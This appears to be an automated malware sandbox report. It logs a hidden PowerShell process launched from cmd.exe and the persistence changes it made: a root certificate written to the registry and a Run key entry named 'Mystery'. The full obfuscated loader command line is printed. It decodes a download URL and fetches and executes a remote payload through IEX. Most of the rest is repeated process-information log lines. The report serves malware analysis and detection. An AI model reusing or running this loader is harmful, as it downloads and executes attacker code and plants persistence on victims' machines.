Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9368584F2 push eax; ret 2_2_00007FF93685851D

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mystery Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mystery Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
